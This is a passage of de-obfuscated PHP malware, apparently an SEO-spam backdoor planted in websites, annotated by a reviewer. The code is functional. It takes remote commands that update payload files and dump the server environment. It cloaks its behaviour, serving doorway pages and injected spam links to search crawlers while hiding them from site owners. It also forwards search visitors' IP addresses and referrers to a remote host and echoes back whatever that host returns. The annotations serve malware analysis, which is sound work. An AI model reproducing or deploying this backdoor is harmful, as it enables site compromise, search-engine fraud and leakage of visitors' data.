@file_put_contents($bd, $buf1);
list($buf1, $t) = @curly_page_get($ur . "wp-themesall.gif");
@file_put_contents($templ, $buf1);
echo "###UPDATED###\n";
exit;
}
// Command "4": liveness check.
if ($x == "4") {
echo "###WORKED###\n";
exit;
}
// Command "5": status dump. Returns the config, the full $_SERVER array and the
// data-file sizes as base64 of a serialized array; this discloses server
// environment details to whoever holds the password.
if ($x == "5") {
$cf = array();
if (@file_exists($configs)) {
$cf = @unserialize(@base64_decode(@file_get_contents($configs)));
}
// NOTE(review): "/var/www/html/input.php" is presumably the path the de-obfuscator
// ran the sample under, not a value from the infected site; confirm before
// treating it as an indicator.
$out = array('cf' => $cf, 'server' => $_SERVER, 'file' => "/var/www/html/input.php", 'configfile' => $configs, 'db_file_size' => is_file($bd) ? filesize($bd) : 0, 'template_file_size' => is_file($templ) ? filesize($templ) : 0);
echo base64_encode(serialize($out));
exit;
}
} else {
// Normal visitor traffic: cloaking logic.
$cf = array();
if (@file_exists($configs)) {
// unserialize() on remotely supplied file content: besides the spam behaviour
// this exposes the host application to PHP object injection.
$cf = @unserialize(@base64_decode(@file_get_contents($configs)));
}
// Only URLs listed in the config are treated specially.
if (@isset($cf[$md5urx])) {
$bot = 0;
$se = 0;
$ua = @$_SERVER["HTTP_USER_AGENT"];
$ref = @$_SERVER["HTTP_REFERER"];
$myip = @$_SERVER["REMOTE_ADDR"];
// $se: the visitor arrived from a search engine, judged by the Referer header.
if (preg_match("#google|bing\\.com|msn\\.com|ask\\.com|aol\\.com|altavista|search|yahoo|conduit\\.com|charter\\.net|wow\\.com|mywebsearch\\.com|handycafe\\.com|babylon\\.com#i", $ref)) {
$se = 1;
}
// $bot: the client identifies as a crawler, judged by the User-Agent header.
if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail\\.ru|crawler|baiduspider#i", $ua)) {
$bot = 1;
}
// The config value is a byte offset into the record database.
$off = $cf[$md5urx] + 0;
$template = @base64_decode(@file_get_contents($templ));
// Read the single record line that starts at that offset.
$f = @fopen($bd, "r");
@fseek($f, $off);
$buf = trim(@fgets($f));
@fclose($f);
$info = unserialize(base64_decode($buf));
$keyword = @$info["keyword"];
$IDpack = @$info["IDpack"];
$base = @$info["base"];
$text = @$info["text"];
$title = @$info["title"];
$description = @$info["description"];
$uckeyword = ucwords($keyword);
$inside_links = @$info["inside_links"];
// Crawlers receive the spam content; ordinary browsers do not, which is why the
// site owner normally sees nothing wrong when browsing the site.
if ($bot) {
// Optional extra response headers taken from the record, one per line.
if (isset($info["contenttype"])) {
$contenttype = @base64_decode($info["contenttype"]);
$types = explode("\n", $contenttype);
foreach ($types as $val) {
$val = trim($val);
if ($val != "") {
header($val);
}
}
}
// "isdoor" records replace the whole page with doorway content.
if (isset($info["isdoor"])) {
if (isset($info["standalone"])) {
// Standalone doorway: the record text is the complete page.
$doorcontent = base64_decode($text);
echo $doorcontent;
exit;
} else {
// Templated doorway: either a record-supplied marker => replacement map ("nr")
// or the fixed %text% / %title% / ... placeholders.
if (isset($info["nr"]) && is_array($info["nr"])) {
foreach ($info["nr"] as $mark => $repl) {
$template = str_replace($mark, $repl, $template);
}
} else {
$template = str_replace("%text%", $text, $template);
$template = str_replace("%title%", $title, $template);
$template = str_replace("%description%", $description, $template);
$template = str_replace("%uckeyword%", $uckeyword, $template);
$template = str_replace("%keyword%", str_replace(" ", ",", trim($keyword)), $template);
foreach ($inside_links as $i => $link) {
$template = str_replace("%INSIDE_LINK_" . $i . "%", $link, $template);
}
}
echo $template;
exit;
}
} else {
// Non-doorway record: serve the genuine page with links injected into it.
list($buf, $ct) = get_proxy_page();
if (stristr($ct, "text/html")) {
// First pass: place "links_a" after existing <a>...</a> elements.
$rega = '/\\<a\\s.*?\\>.*?\\<\\/a\\>/i';
$resa = 0;
$links = $info["links_a"];
$buf = change_page_regex($buf, $links, $rega, $resa);
// Second pass: place "links_p" after paragraph endings (the 30 characters before </p>).
$regp = '/(.{30}\\<\\/p\\>)/is';
$resp = 1;
$links = $info["links_p"];
$buf = change_page_regex($buf, $links, $regp, $resp);
}
echo $buf;
exit;
}
}
// Visitors arriving from a search engine.
if ($se) {
if (isset($info["isdoor"])) {
// The response body comes from the remote host's /ff.php and is echoed verbatim.
// The request hands the visitor's IP address, Referer, the site host and the
// requested URL to that host, and reuses the visitor's User-Agent.
list($buf, $curly_page_get_info) = curly_page_get("http://{$domain}/ff.php?ip=" . $IDpack . "&mk=" . rawurlencode($keyword) . "&base=" . rawurlencode($base) . "&d=" . rawurlencode($host) . "&u=" . rawurlencode($urx) . "&addr=" . $myip . "&ref=" . rawurlencode($ref), $ua);
} else {
list($buf, $ct) = get_proxy_page();
}
echo $buf;
exit;
}
// A listed URL requested by neither a crawler nor a search-engine visitor falls
// through here and the closure returns without output.
} else {
// URL not present in the config: relay the page through get_proxy_page() and stop.
list($buf, $ct) = get_proxy_page();
echo $buf;
exit;
}
}
};
$EMsQnfRTJDs();